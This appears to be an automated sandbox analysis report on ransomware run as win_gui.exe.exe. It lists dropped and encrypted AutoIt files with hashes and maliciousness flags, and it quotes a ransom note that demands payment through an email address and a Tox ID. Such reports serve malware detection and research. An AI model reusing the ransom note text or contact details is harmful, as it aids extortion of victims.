                                SSDEEP:3072:ohBmlGbGArp8BcJEWekizUZ5+bwwny3O4EJjV:ohBjKArCBcJEJkeUajnye4yV
                                MD5:B04EE71D5F6269D35BF1410D4B7D8651
                                SHA1:516836F2B9AE0D66B19885A004F4A730F3E90D27
                                SHA-256:6B03EBFEA22E71F1A38BFDA19780B45E9E90A84F410BB697A321666610E5B871
                                SHA-512:7597F94441DBB2A6C3D64C63C3D5009B3D41A5E96F2F154A0F94A2FBFB7A8A3518FA61BEFC0E9074264776747CD23A9BC95323371A0E314CA6210AF629A01CCA
                                Malicious:true
                                Preview:..}........g.]s..+.h.+..`s.....!...U5...zR.....".".fz......z.D.4.H.l...3..2......{.......kw.../.I.".o....lh../O..z....S...<....Q....Y..2..^.p..j.X$....Z.Fq..Iy....8+F....8..G...0..C.r....w..S.../2W..L...@..g...h2.K..jL.R.X..F..d...Og.m...T.hm...@.p.?..L\x"*......H..+.ZT0z....n...I.8..z....V.sn4....w.v......b....w..3.....E_$..x......s&.r;p.. _tn..U.jXT.h..q+'4,Ce+..X....4..W..e.RKY^."..0..Cc...t%..OH,.).. `...t|'W..n.. ...X<^..C.P.....LL.*.T.i...`.(.a.V..&....W..I~g.H.6'..'...W(TX...)..M.'!B.nPN...c~...h<i}.W..UC:).U..J.......u...Z(H.>......W..qpJ(JR.XW.^.f.S..g.6.4.B.[...n,yC.m...X.,.(...n.....m*.....V.....]..$t...E..6:..z.1.4..Gy.+..-*....O...nr...j......t2b..S_MZ.6.Y......K.C1.J.O?lb....}.~\b>..^"T...@.?B..0..1.8.(....;_P...*..}...|.....84...........p.r....O.....6f.%.7...1..N?I.X.......A...+.1...4E..]q.U..'.....%....]..H.1s.;X..}.*..B.mJ..[....#.n...'.j 3..,....[.s..N:R.9.....m.Z...^.....v...g....9.>.4gUT.c.....v.F..,.3....D...n.z

                                C:\Program Files (x86)\Mozilla Maintenance Service\logs\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):239616
                                Entropy (8bit):7.9992979133215085
                                Encrypted:true
                                SSDEEP:3072:6uzCX8yp60RzK9l1WWBhahIHudxHlPtgzyraOO2G2BNmqG1UrqwGaUci3R+sjCys:7Mc0E9FiBX7JLLNPZK3/SpIZhAj
                                MD5:1B064D2CDBFC2822BFC1D33DE8D4E570
                                SHA1:331073493E3FF4F3F829EA1528158E25F9EF6D04
                                SHA-256:A59CA69D9029FE932411CA0ADEFBC05147A52A3F96E6516DB8AAEA909699D8DA
                                SHA-512:EF0B2895E60FE52B3DB32EFF0096F96C0EC90119AC181160F6557F0267D21688EC48AB5DE25B78BC874548D8CFA83E1297658A67847EB52CA9FCDCC7B15AC35D
                                Malicious:true
                                Preview:l...../'.(..i.h.al ;A..?.\...P..f.:.a2..2.Y.\..@...KX. ..m.Yr...|.|....)H....J..F...3..3^.'.x..J].`..z..w..j...6+*......eJ_..W.e5......D.*....."].E....j..?Z.a..weR..r.g.o..n.B.g...o....0.T0.&.W.qM...9...&..X.....'.(..%.2I...@:.`L........DS.W/3.5R$o..q.M......7.Hl.....f.B..*......X.n..cc.[G=...x..eG....5F._....Z.TN..j.......'.n..4D;B.V...Y.... ../.r.i.^...c.....j.....d...c.A.7..)..T......v...Q*.3.....}..P...6.?.q.z.6!se......6]M....,f...Vcc.&..M.....6u...n.$....n0,.?fo.o.....D}Y..`.u..V...:.?!>....mh.jR..}1....!V.(>.2...aN.}#c(..SIA.4.K..L....v..%*..e..9>.....XuW.D._.=.n.e ............L.>..O......K4..u..P..]...w.,.rna.1..s...[G.7...]{.0,...A....$.U...e.9.............+.t.2.(.....`.h&.t.s+..x.2K5=7..g1. C]?....9..[..K..L.?..9.u.....0..)......A.....E..,&.R....FR..v.=.Pi0..........".~........e.G4L..`n..&>{....ODL..Bh..1..@.p.b=...q...`-...;.PhN...vzy.'...eG.3......V..0...jmuO.....G...Y.p.`;j.,....,o.Q.iKT...(..kXt...... ..c......

                                C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1810
                                Entropy (8bit):7.887694974950454
                                Encrypted:false
                                SSDEEP:48:b3HOZiNZOiKLPdixbh8Yhyd/WyYu+MAVMJg6TZ:TOUGrdixbh9ydevuAVOZ
                                MD5:C69165DA29323A5F78D1142A66BC2772
                                SHA1:D50D613330E1B96BD3EA24ADFCC3F222C25D8E9F
                                SHA-256:209F0761A443ED47BE665CEB9FF90FD155E9F3B3692C5AB2929C20906E46F6C7
                                SHA-512:EE07FE35D61EF4EEECDE16922CCAAB25D5F4359C447831F3296B025E0C91C1D823DE434DC29F0B5F89A890F890E09D7D1FCCC6DD107124F5A10A73DBEEA5E258
                                Malicious:false
                                Preview:_.F..H..+..B.e]...g..q...iSC...r.R.......5P.\......a}...n.._r2(.(..j. Z.l,...o.T............0^>.....M..X...|.(.%.k]J\.k0..(..Y/..y....o.>.lu..]..*[.~. ...5.ca.A.1.]...Z....G<d...a1......m.m.b..n..W.b....Y"\uD..;.G.W'..7z.)......ra4..O....V..;.`.XA...L-.;w.....k...........QE..bz?<..F).+..Q.^8.f....l.u....N.q.FE..J.!E$...........]...#.'^..v.y...\..'q*?. .Y...n..K.4E..l..R.p.. ..R%X....j.7n.6...%.........3.kB...e........=.R..i..}x0i.wY..o.[...}.(C]da..&HJ.cv....<t.zgcX....6"..Z.\6...%..xp6..&L.8%.....c.R.*.U....8E...k.......Lu.....V."l5. ..n....._-.G....'.Vwu."..plzp. ..\....0......0.K...c.".....{..."j..3.....G`Je......p><i.e....x..K.u)V.$ .~.E.&Dx..@*8Uy..B...Qq......./.Y.?..1...._.7d.M....Oe.N .ZU....R$$N.N..f.{*6 e.[.H...u}..]..Yc.......(.M...S$. 7.y.<+es33@..l.".F...t3d.Kfz..W.>..!....T....!~;..:=.g.....AH....oB..{..mz...ml[Xm%.V.Wq.!s..F..e[.....d.].a.....R..E..k.1a.7M.5j......c.Y...j.n...Rz/G...oX.%;.><l.L.~9O..J)..#...1.........

                                C:\Program Files (x86)\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\autoit3\Au3Check.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13693
                                Entropy (8bit):7.9877505603833185
                                Encrypted:false
                                SSDEEP:384:SercTtjIQcdsuMC6vXsxlKr1oTrvtw+VOc:zcBIfdsVCeXsxEgrVwY
                                MD5:F14CBEA46D6EE259A53CD01CD3594CF6
                                SHA1:DDA7F88631D014AAF056281B021FC5F581C21F69
                                SHA-256:FD34EADC55EE6BF17F643630EDDCD664DF6BB4976C10846B53CDD2FD0E51E4F7
                                SHA-512:9171955AF20678F411FA77E2693C0A6ED8989A39B9368BC7AFB6A6A55562951E716D2EEB95F5FB74BAE7B1601EFAD615BFA43EEC889331455F1D8952CB95CE07
                                Malicious:false
                                Preview:.e.}J.`Z."H.B..?.S`..7qSl..........m..*/.Q../OB.7.a.D=*..+B....P.Q.$.h..`.O...Cx.....).^t.T.....;2..f....f.....cf....[k.?..c.e>...Bl.Dw.z...e....{...._6.g.J.N.....+...i.9......T...g...e..........[.j.....26..U..*.Y.%Q0.._4.f`.B.....7.)......v... .&W..?y<...ta/..w'o...4.|...W..E.V./`4.3...k..<......D7.I......;..K...7;o.pqz....4...F.....v....p;Ym..`3.[...4.o.3...).|..4.'.o.D..i....ymI.p.Wa.y...v....6..4.F.s"y.^..N..)*v.'.Q....v.oz.3.6...'..)......K....R..:0..0}@*.}*....)....e._+...a....:..7./...Z......V.{.>?Ht.V.......<......5.Y(...._.7#.lO..p..&q#d.ah.n....Z..R.|.3V.n...C..K......W..5V...eitp..."k5.z.J....g../.&../..9.......vu..]..5^ 1..Dr..nf......b...5{....x...l'......M.C~2..sD..V.q .w..e......XDT....J.D...-.f]s..b..@e..a.,.j.m.^F*D..U...]......|...z...|.G-40R.....36..]5..2..f..T%.v....0.....C..m.0....m$...v.v'j...UB^.e..u.X..l\...2.W...+..m..n+B....t.."..1..i...K:zA..L....!...'$........e.J/..Yr.........;bI..P..D..:.pAH$....5...\..'..0...RN

                                C:\Program Files (x86)\autoit3\Au3Check.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):234696
                                Entropy (8bit):7.999142776172254
                                Encrypted:true
                                SSDEEP:6144:3Au9tuRx/tsmgk2HUEpjUtwha5aJYYqEbCnnAa4eZK:p9twa3Na0a9rEFJ
                                MD5:3D54BAAFFE03A2520638138A31FD15D5
                                SHA1:7755AFD7534FCF3BB4D6E24FD3DD918EB74612FB
                                SHA-256:4D5C45754D2D4597224D4B9BE101FC79391613106B74573A51D1E9DFD413CB0D
                                SHA-512:4C5603D93FDF32F3CD67769E9BD7A131552E99078A9BB48FEFBE333BD1D70E8C3F22A4D1DC0EB827A1B261C85575038DC43B8F25C44D08356013B260B5E2FC0E
                                Malicious:true
                                Preview:.q....(z...yH9K.^...=....3..2.Gd.........p..jjG.._.K)".D.!.[J...K..!.G!...-.a..s....qH.....2_......,{......%=.8%..{i1.E..M...J..-..AY_..)..P[A........w'k9[$.|....@f.N3=4B'..Z-.&.G.`.`p.1.l.....[0#l.mz.=m..5..y.JZ..j@X..Igt8."zF.>.............!..C.....D{....B6;..U..C;.#1-CNz<.:....{.......ai....yV.a..O..h.'.....3.....!t.2..2.....N.~.[...6.......n:F.Fy....a...Y0VN...5.@...|6..e.....c..,Y.S.S..%@.........a.>sq$...ZL...F..E7).;../N.V.....nI.k-....L.:.>.....'.f.a.!.....Pm..Nf.Oo....O...t...@}..:.._.C._.u....IR..C.RG....."...J.SE.>n.Mp.kz...D..Zw...... .4f.0!.o...6...zP1._....e.Ly1.i3.."-.FFw......~..8..[.1...5..._....X..G.dR.\iOp...fJ...}.g..0....+p.....sn...t...w..,..y......$........W......}q~....@...(.z..#.x.....}...)Mo.U ...8.h.4T1....`..0.K.BV(m$Y..1....7W.........d8...u..3[[..Q......>....S]d.#..x....Yj..C.DnE.. H..=..P..V..w0o.9..6.CIzK.o....I...NJI7......]e8..~....K.F....-...l.@._4.B.M...o.........M\..pkrUo....{?r..-S.../P......t..1d...

                                C:\Program Files (x86)\autoit3\Au3Info.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):176840
                                Entropy (8bit):7.998808341285109
                                Encrypted:true
                                SSDEEP:3072:zvDTnF6mZ+UDhcs7V/8iuDGPHbfCp4y3NdupnCl9Zy7sVUw4dkf94Gld1b:jnF3Hcs7sDYHzCp4ud9MsVUwik3ld1b
                                MD5:E44D43CEB63E1F03FE7F18FBBDE1FDD2
                                SHA1:6921D4041F44C809055E4CCB8CC0C076DFEF0BDB
                                SHA-256:FA3549D98606DFB67A754CD01A1774CA440F3505FED75EB32EDA6DC7FA48402E
                                SHA-512:5A280050DAFF007AE7E97BB1D2A1AE055E7843E6679B8E20EDE926F28EF0ED99C5D03AC2365AA61CA6C075BECF8D56568036C3FD03464AA1251811B6D85EBCAB
                                Malicious:true
                                Preview:Vi..0...}.....(..~...).-....ro.......hx.....U.X...L..?;zN.#.X...b..`...B![.....&..C.....ET.xKI..Xt....s.v_."x;W.'....2.[s....(..kSSmI.Y..gQs...^...a.y..?.....f...u]..%.7h..Gt<.e>#..ey|...aQ.7?....q.N>.......WV.8..*....#...h3@C.(=..3..z.H].q.7.u..y.....o..f...y~.x..._..@..R,,.....u...M........R.G.V.=~.;?...w......{h...S.}~.Gg.$.(..d..o6.......w.z.iu...N.b.....t.;([....$........S. '.!...(CCbZ..C-.>.....+.V8.....$..].`DA...&.M..}.@..Wv..W@]..(.yAcPDPi...?-....=...1.. .Ti.....Ai.e.E4...z..PY?.m.o..v..A.+..%5..x..%..s .....O.@..`...s\/..:)8;A........=.W.k.e]...B..i...$..o..`.......ce@. :f..8.Pe....r..0.k.....)..ckA}.)?..~...cT......a...F E\;..!......1`...%..<E.n.......^.>.,aS.%.....O.....Fr..-.k.y.....f.7.....;.......+WK...e.lJ.-.. ..L.."`.`n.^[....m.......Z.*..v.^zwum.'M..#......(]..p...g.x...".g.,.....L..}xX........O.$~pl\,..zV.1{.F..W..UAZG.U..Db..=.u.....L..........^*>..8.~.....^.w..]$......y.}|j...4..B6V....V.&..l..6:...h...C..+Z.g.u....L...

                                C:\Program Files (x86)\autoit3\Au3Info_x64.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):196296
                                Entropy (8bit):7.999106659430505
                                Encrypted:true
                                SSDEEP:3072:NtVyf4xheJMsZ2XXuOJvpP3niB2yqCXSudih2yLD2GC4ARPPLr6FOCWElPq:NtIfM0usZSpvnW2yX7pyLiGC4W3H
                                MD5:734F3D3B91AE128D3AFCB81137439574
                                SHA1:BC80B7F1BA234A088ADACAD954A37BA3CE6FA116
                                SHA-256:AED4167B3B0E8FEDE552486F5B5F0E7453E602B652F5E24DF7408DA31BB7E8E5
                                SHA-512:F64DC6C6BFA9694EB42BEE6BB2F69B03C66CB1A10D5043A556AAE952C7D8E31146C3B2185552CA747583C36D3B751EDB1B843A078F6C641DAC84165846FCFAF3
                                Malicious:true
                                Preview:....@~.G.....e........R..T.>......@f.....D ..f.;T..,......._N...^6..d....M...".x..V.+#TF. .0.n". ......i.......{..-e..i=.%`..%bY=.d%.+..XM..tO_q|..s.....9(.0.y.=)..K..V.l..V.c......m'.u?...#..Tx..kpR.....i.ov.r).c.o...a...4..p"...XS.....5.ae?|..#..;d...gS..|..R.q.|>.|t}.X..~...........B... ...Z.......!........V.P.7.2E..>..D.!.....O..&..8_V.......d.....}.}.{V....M....|..:...H3..........3...7...*....M...........p.F[...u..%L.8.Q....+f...{e..G..49.x.e.1..%....3C2.....$:..A~.w........Tj.7.w*3%....9.N+.@.(}.<.o6.$.b^..z:]bz..,..th....l....}.X. .......]...=i8....iBki...V....Z<7#.~.)3.......Sx53.,.Vo..&Io.3+C...X.`DW..=86+V\....\.s....o.*$.,}.6...k`U....g.D.w....\H.v.k......o.F..YS)...T.W...c.^~......9..3a./.[.H....X...B...@..;...p. 1\\u$J..)U..0]...-$.6.9.&.4.....O<j.b..@..Z..&M.m.hV...+E...j..D.q...&n.k~...V"....?^g..v.........q..,+`.f...4}...O.!V.n(.....L0RVM.'[sZ....V.w....d"l.......5.2.,e..i..Rf.&..F1...|.t*sT^I)+...;..nh..{.r.T.:...... N..`(.

                                C:\Program Files (x86)\autoit3\AutoIt v3 Website.url.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):812
                                Entropy (8bit):7.710767094402821
                                Encrypted:false
                                SSDEEP:24:0ZsfyGpZ5z/wpDyYPGTNj0hOHAVMJg6WXs93K4:Q+9pT/WyYu+MAVMJg6T5
                                MD5:37E6C43602D8760CFC977C202FE58AFE
                                SHA1:04A7F866ED4520399C10B47B4AD3D6A68EDB3FDE
                                SHA-256:0FD783BE16F4983A34B94D41EA81B28110555C9EF79426D63D4E35A7C8EA5724
                                SHA-512:1186C82F75E22D8628761055D67E6F00709CA28D36EBFFC6075E0386D3654F2A4CACD3AAA591C73CFB16898C2C5EE96F48341504EFE7567197B8DBA6C9709B26
                                Malicious:false
                                Preview:F|..v..&yG.Fx...%x.?.....~..D....A.f.V.BS..9....xp...."|....z..v6.IGJ#3.+....a....+k.\h.\...V./.m.ls.]8..NJ...c.Nf..q..i].......NK:....*.{y.3....G..h.|O! .jYD...}..C.......e.#ay..I?.js..N\...p.$2...}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N....{.B..^.A..C..1 .E...t......YIm....................fk.W...f

                                C:\Program Files (x86)\autoit3\AutoIt.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7186249
                                Entropy (8bit):7.995708840734016
                                Encrypted:true
                                SSDEEP:196608:b8aNYqqNaXN0wMHZVCqo/ugQ9dz5COj1fNAgBMkKi:bJpqlzH3M/uNDz5bWgBAi
                                MD5:8EBCA2DF5CB8AFF13B44E6544BD795D0
                                SHA1:007278F60651216E5CD151D621F897A965199C2D
                                SHA-256:44BC34E80A6BD4EB53FB1BC86456096BCDE00D28E202A8DE27D877036409BBB0
                                SHA-512:4EA97C3C5DDAB1FA6CC2FA82090EB4C0B7E23ACA5E422FAB9AAB17936BB4FAC25D995241E9F5657A27E8B14EFEAEF9E4FD9AEC73C824695FC0D7C2DBCF365AF8
                                Malicious:true
                                Preview:.Q.1..+0.^s.o..yQ.....Y..........f>..wO~....G....s.n..........;.-w......e.$...+......TB......."t2w.#.?XG$9.s..C...V..........nH^..7.\.w..X....:e.j'ey..B.z..>[q.....w........-...#..)...2..:..H...k.ef.+..!..Y...n...<.5l[..A'..C.).V.Bt..a.."E<..f...G.+.J.3....&.......j.d...)a.T.. ..k..:.>E....P.b.....;..58.W.MR'...e|.d.6.jt.n....].yh..&.4......\b=9.....)..:..Z...#.r./.B.Y..).(......_^.....[.0.z..S.4L...N....*.{.F.if...9.e.?.L...A...^..f...f~P....'..k....Z..]..1H$.8...5&...3.- xVk.....dC',...33......:......v...,g...7w...^.Xz.j;...........#...L...#...G...?.......|0.|=i.L../F.~6..n..S......,@.M.p.`.]W.(k.*N.N........V.......6..t(..7.....j.L_..OKr.....Pu[.m..........k^.xX<3..Rd.!..p......y8.{.......I.@eR...J.U...=..6..s*n.uC.D.q.?....._./..g.J.F..2.....{'..!NI..i..f.C.r.}........XA....X3......4lr..e.......Q..l.(i.3S...W4.....J......@...X..S.~.>..2.%....s....J..l~._rR....nsJ#>...%9.d.B..&}.@..u.a.D...D.tX.JKT..>..od.m.@*..-.9.8..C

                                C:\Program Files (x86)\autoit3\AutoIt3Help.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125112
                                Entropy (8bit):7.9985858202799855
                                Encrypted:true
                                SSDEEP:3072:JWPZVHAMB6KphLPMsyKbwlqLHfZS8eKvjmqEi5XvNnUy:0PZZA+jpV1bl/ZSxKvjmW5fNv
                                MD5:97DEEC4E633419F9D560AB655B76E0A1
                                SHA1:18B3F7535A49CE230E8A1F6AD301330249BDDFED
                                SHA-256:A59915E7A6C88250D8E991F2B48865F1677B8800CF3050A88C5880310267FBE4
                                SHA-512:5254096FF248ACE2C6CA9BA0A8901835CF3C8CEDDE250EB29E88077037EF5E761001D8BB3FF8E701AF79F3EA00D1A7C2CC8E47C99BAC4EB539057794F5AC2FFD
                                Malicious:true
                                Preview:f.+...Q8./iY....."..7[..a..a.4.. Kp...k 4....... .R+.d......P..l.z.T..bN....$..HU....sj...u.....C.E..:%..^...y...!x.29..MU....Y.f.... ...v4...kB]...+......C....YO..k...C;s..=..j>]q..V....CL...7..[...1o.).....*.\.k........`*.3.D....5.p.U....E.o...T...0...R...t7.D..l]..V...&.t..s.|.;...@......x./....S.yN....-..p...A%Q..o..."$..{....H...0.w...-... I).x.....8.wR..~..+.|8....."..lj.H...ADCO+..&.y.tM..-P.=.d....3......Vn.....T......j.TQ.H....C.....O.I..kV@M..O.I...q..(#.]...r.......>L..........Xw...6W.....R....w9.QY.'....&..l.6.!..2...<o..._>..>Q..*...(.\.=.:%.T......9]._......[._.'h...Hb.x.!...3....<Y@QT...*...o...%......K.'..`.Z..+6.*..tV*...1..q^t06.l.....1.B.........d&._#.c...].d2.-.?..."...5.JvG..o...PX{$=....K..$<.<..p.L!...JzP.D..W/F.......F.}...+.IL...Wr..O........O.c./BhS..Z........./....N..|z..#..S..O[..tY.`._.J..q.........8...~..GrG...1ozf..k.U....)....t..wi`..g..:....M......Y.......s..iaF..d.".FLu....Z.!|.s.7e.A...tS..}.Hz

                                C:\Program Files (x86)\autoit3\AutoIt3_x64.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1072312
                                Entropy (8bit):7.042915404968756
                                Encrypted:false
                                SSDEEP:24576:ZLsWUon6Rb6qu1PyC+NRLtpScpzbtT7pyOolKLLfHB5O2cxaNIdU:+on6AqSPyC+NltpScpzbtvpJoMXD7kaN
                                MD5:9A40E1B6F8BC2EF3DCDE954B92ECACFF
                                SHA1:9CFAEEFB9ED9D5720DA7B0B109D2C8F003087E5D
                                SHA-256:8747E687691FBD950D400B6659AA27B6D746F1A93DD22701895ED05975B102A1
                                SHA-512:809F6301E35C4646C07BCBD60E5C2DE91BC7346EA02B18A18827F3A140FCA67A31F83C2C61ED8FD005BC6ADA5F196CB7EFD6232866CCD4F2EE7E72601F54AAEE
                                Malicious:false
                                Preview:..v.n.=...d..K.F...........d.^.t..l.D.A/vf...........O....O^E...<Z..u...Q~..u...:r.Py.<I....`..[...!.......-.'.7..1.K.Z]*?..#l.."......7......u`.~..E...6...z%......$....GA.......{.....m+QI.....]..`^.........e..U._q....l.....K=...>=N.0..t.\..r.<..O...\..r.........t!....v?;.?.....~..~./.+....N8...z....../...h|6..j[Etu..Ekh&.......J..*.0./._.l..x....^.T..kRCV.av.H.{d...f.....3.Ih.%3#..xi..2....U..'.1.j.V}#`%.........~X.l.X.j...;...X...i...?.O.k'.m....v@...V.wK.. ..d.c.........eQ|*n..r...O....4[..=....g?.uL..+d<.>n.eh....;<.^...Rn..kG.~UI.)..nT.qgL.V.g@..G^0....%...+">T.).e7..a..o;..%......b....BN;^.by...g6h..u...W=[r...m.B...u../..,..D..D.YX..J..........X...i...,...;|/..7..'.A.........Ki.6~et&..H.(..t.@#.....'..Ea..8[...3..*}-.M.(..L%..D$.../...\..Q....+.}d.G..r.>......T.?4..VS...T....2......i1RS...6..F*>WgrcK....yt...R..\p.X.?..g.... >.y......F7.K...Y..OWK...3..+:%...c_yC..s.Ty..a..AO.\BU.@..$....&$.....<...,I..~......u.

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):200994
                                Entropy (8bit):7.9990215482457305
                                Encrypted:true
                                SSDEEP:6144:vKBCZ3b8J9LYK2hI4oKsqoNEivjx9OYq0kuGcn:vQCru9T2fsqkEiVsZHcn
                                MD5:2AD5DA53E4EC1CA88D321888E1C1DF26
                                SHA1:09C82F2431F6FBD58E0A57AB7BCE6FF23F0E6190
                                SHA-256:131F36DB31E41D4B6FF945E1E020A0A8A55CAC7A41B6A0DC4EB34F058C08BE7E
                                SHA-512:FCFEABB6A09364B0C734D147A65E638E303CAA440201E9FAA742EF5D6699CA0B2DA5CC959AF1644EF1F27C9FBE77EEBC2DFE4F580C4976FD9B0F08B9028C2329
                                Malicious:true
                                Preview:.0f....;.O.V.....Y."|...?.....z.XV.5..5=.T.^H...E.x.`e.3R.L...?.....q..$.<6-5o,......N..y ../..X.>'.$)Dx..m....N.*.+....yqXEk......`?_.Z%D.r.*._.6...k../...b.[9.r..".=...QU9pg.{.P..k^...w0 .C...4m'k29&.6\j...N......3K$[o4....s.mS.?....!.....C*...>rxWQ>.@..2. C...m@.......u?......:^.t.). .A4N....k$..33L.\....7JiV_...#..].~.(..Z.Zg..f.lhA..F.......!.(9.#K..`..F.$..z...k..G~...).odY......{<.Q.Cj...~S.....`>.._......o.-a.+..2'......rO....G.$..p....D..6><.|.R...ESU.w......I.. .%?80.3#9..y./........t+.E.H..^....G:>.p%.2.!......N[.K....x....Z....-.p/.E"C..,ZL....9.\QL.......w...ta.~!.~..h..O..%{T..G...kpw.m6..../3!..-g.1>eX.D.Vt9\7|._..S.j..h.....5Wl.............3V.k.WsB..Uct.;.a!}..^....?w.&.....g..<.A......N..U....%..T9`............v`...F,@...T.b..(0L..).BeF.CQ`.g"..>..E..'........-....q...p.=%q..g..k.!&y..s..)6.....r........}...j..N..T.,:.nqn.i.P..c..K;....=-....5.^.J'.'.h.p{..v....Yk..;"......*....`..,c....o4&c.....&9.e..*x.ah

                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX.psd1.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34062
                                Entropy (8bit):7.994227657485516
                                Encrypted:true
                                SSDEEP:768:gg6BwT9uc8XkBVwgWhTOXBGSfP0+R3zf/SzjruzRAJfb2T3Hws:8Bwl8VxhToPBDSzPyRk23t
                                MD5:194638EF54FED96EFAE023E0CF09B9DD
                                SHA1:670EBA95FF1B27FF91DEE4C4AE205F0A79ACA31A
                                SHA-256:78778C65D08827B94F583CA11A4C7383C65D2499C4BFB6C40E9FF0A0EA926271
